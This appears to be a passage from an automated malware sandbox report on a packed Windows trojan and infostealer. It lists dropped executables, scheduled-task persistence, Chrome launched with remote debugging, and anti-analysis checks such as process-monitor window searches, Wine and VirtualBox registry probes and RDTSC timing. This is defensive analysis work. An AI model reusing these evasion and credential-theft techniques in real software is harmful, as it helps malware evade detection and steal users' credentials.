Source: random[1].exe.6.dr Static PE information: Section: ozbvvmja ZLIB complexity 0.9943599824514039
Source: f7fa65d988.exe.6.dr Static PE information: Section: ozbvvmja ZLIB complexity 0.9943599824514039
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/6@10/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000009.00000002.2844574821.000028F000432000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000009.00000002.2846494174.000028F00074C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 63%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe "C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe"
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2912 --field-trial-handle=2744,i,15832663537055450618,8229323892131128527,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe "C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2912 --field-trial-handle=2744,i,15832663537055450618,8229323892131128527,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1917952 > 1048576
Source: file.exe Static PE information: Raw size of rvvxjflc is bigger than: 0x100000 < 0x1a2600

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.cc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x44e7f8 should be: 0x4522e4
Source: f7fa65d988.exe.6.dr Static PE information: real checksum: 0x44e7f8 should be: 0x4522e4
Source: file.exe Static PE information: real checksum: 0x1e4046 should be: 0x1d7c3e
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1e4046 should be: 0x1d7c3e
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: rvvxjflc
Source: file.exe Static PE information: section name: jcggrwcz
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: rvvxjflc
Source: skotes.exe.0.dr Static PE information: section name: jcggrwcz
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: ozbvvmja
Source: random[1].exe.6.dr Static PE information: section name: ydmfclot
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: .rsrc
Source: f7fa65d988.exe.6.dr Static PE information: section name: .idata
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: ozbvvmja
Source: f7fa65d988.exe.6.dr Static PE information: section name: ydmfclot
Source: f7fa65d988.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.7.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097D91C push ecx; ret 6_2_0097D92F
Source: file.exe Static PE information: section name: entropy: 7.983608740333537
Source: file.exe Static PE information: section name: rvvxjflc entropy: 7.95542311892839
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.983608740333537
Source: skotes.exe.0.dr Static PE information: section name: rvvxjflc entropy: 7.95542311892839
Source: random[1].exe.6.dr Static PE information: section name: ozbvvmja entropy: 7.953751777733906
Source: f7fa65d988.exe.6.dr Static PE information: section name: ozbvvmja entropy: 7.953751777733906
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E809 second address: D2E814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8FDD4F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EABD93 second address: EABD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
